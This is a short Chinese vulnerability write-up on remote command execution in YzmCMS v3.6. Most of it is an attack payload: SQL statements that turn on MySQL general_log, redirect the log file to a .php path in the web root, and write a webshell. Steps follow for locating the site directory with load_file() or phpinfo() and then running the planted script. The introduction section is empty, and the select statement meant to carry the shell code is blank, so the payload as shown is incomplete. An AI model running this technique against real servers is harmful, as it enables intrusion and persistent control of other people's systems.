# YzmCMS v3.6 远程命令执行
### 一、漏洞简介
### 二、漏洞影响
YzmCMS v3.6
### 三、复现过程
Payload:
“`sql
show variables like ‘%general%’; #查看配置
set global general_log = on; #开启general log模式
set global general_log_file =CONCAT(“E:\\study\\WWW\\YzmCMS\\test.”,”php”);
select ‘‘; #写入shell
“`
1、执行sql语句,查看mysql日志配置情况
![](/static/lingzu/images/15896468533357.png)
2、根据日志文件位置或者默认站点路径来推测站点目录,可用load_file()函数来测试,确认站点目录位置。或者通过phpinfo()等信息收集获取站点目录。
![](/static/lingzu/images/15896468677717.png)
3、分别执行下列sql语句,将脚本代码写入文件:
“`sql
set global general_log = on;
set global general_log_file =CONCAT(“E:\\study\\WWW\\YzmCMS\\test.”,”php”); select ‘‘;
“`
![](/static/lingzu/images/15896468835249.png)
4、提交参数,执行脚本代码:
![](/static/lingzu/images/15896468908470.png)
请登录后查看评论内容